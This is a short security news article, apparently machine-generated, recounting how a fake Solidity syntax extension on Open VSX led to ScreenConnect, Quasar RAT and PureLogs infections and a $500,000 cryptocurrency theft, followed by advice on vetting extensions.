Ethical Hacking News
A $500,000 crypto theft was carried out using a malicious VSCode extension that impersonated a legitimate syntax highlighting tool for Ethereum smart contracts. This incident highlights the need for developers to be cautious when downloading extensions from open repositories and emphasizes the importance of robust security measures in place.
A fake VSCode extension called "Solidity Language" was published on the Open VSX registry and stole $500,000 in cryptocurrency from a Russian developer. The extension executed a PowerShell script that downloaded additional malicious payloads, including ScreenConnect remote management tool. Once ScreenConnect was installed, threat actors gained full remote access to the developer's computer, uploading and executing additional malware. The incident highlights the dangers of downloading packages and extensions from open repositories without caution. Malicious extensions can be distributed through reputable platforms, emphasizing the need for developers to verify package authenticity before installation. The lack of antivirus software on the victim's machine made them particularly vulnerable to this attack, underscoring the importance of prioritizing cybersecurity measures.
The world of software development and cryptocurrency trading has witnessed another shocking incident involving a malicious extension for the popular Cursor AI IDE. According to reports from Kaspersky, a renowned cybersecurity firm, a fake VSCode extension named "Solidity Language" caused significant damage by leading to the theft of $500,000 in cryptocurrency from a Russian developer. In this article, we will delve into the details of this incident and explore the implications for developers and users.
The malicious extension was initially published on the Open VSX registry, a popular platform for distributing VSCode-compatible extensions. The extension claimed to be a syntax highlighting tool for working with Ethereum smart contracts, but in reality, it executed a PowerShell script from a remote host at angelic[.]su to download additional malicious payloads. The JavaScript file named "extension.js" located in the .cursor/extensions directory was found to contain the malicious code.
The extension's ability to impersonate the legitimate Solidity syntax highlighting extension made it convincing to users, who unknowingly downloaded and installed it. After installation, the malware executed a remote PowerShell script that checked if the remote management tool ScreenConnect was already installed on the system. If not, it executed another script to install ScreenConnect.
Once ScreenConnect was installed, the threat actors gained full remote access to the developer's computer, allowing them to upload and execute additional payloads, including a malicious executable from archive[.]org that contained a loader known as VMDetector. This malware installed two notorious pieces of malware: Quasar RAT (a remote access trojan capable of executing commands on devices) and PureLogs stealer (an infostealing malware that steals credentials and authentication cookies from web browsers, as well as cryptocurrency wallets).
The incident highlights the dangers of downloading packages and extensions from open repositories. Kaspersky warns developers to be cautious when downloading tools from these sources, citing the fact that malicious packages continue to pose a significant threat to the crypto industry.
In this particular case, the malicious extension had been downloaded 54,000 times before it was removed on July 2, with an almost identical version published under the name "solidity" later in July, inflating the install count to nearly two million. This artificial inflation of download counts allowed the threat actors to increase their credibility and reach more users.
The attack demonstrates how easily malicious extensions can be distributed through reputable platforms, making it essential for developers to exercise extreme caution when downloading and installing new tools. Kaspersky's advice is clear: always verify that the package you're downloading isn't a fake, and if it doesn't work as advertised after installation, be suspicious and check the downloaded source code.
The incident also sheds light on the importance of robust security measures in place for developers. The fact that the victim had no antivirus software installed on their machine made them particularly vulnerable to this attack. This emphasizes the need for developers to prioritize cybersecurity, including installing reputable antivirus software and staying informed about emerging threats.
In conclusion, the malicious extension in the Cursor AI IDE serves as a stark reminder of the importance of cybersecurity awareness among developers and users alike. By understanding the tactics used by threat actors and taking steps to protect themselves, individuals can mitigate the risk of falling victim to similar attacks in the future.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Malicious-Extension-in-the-Cursor-AI-IDE-A-500000-Crypto-Theft-Case-Study-ehn.shtml
https://www.bleepingcomputer.com/news/security/malicious-vscode-extension-in-cursor-ide-led-to-500k-crypto-theft/
Published: Mon Jul 14 12:43:33 2025 by llama3.2 3B Q4_K_M
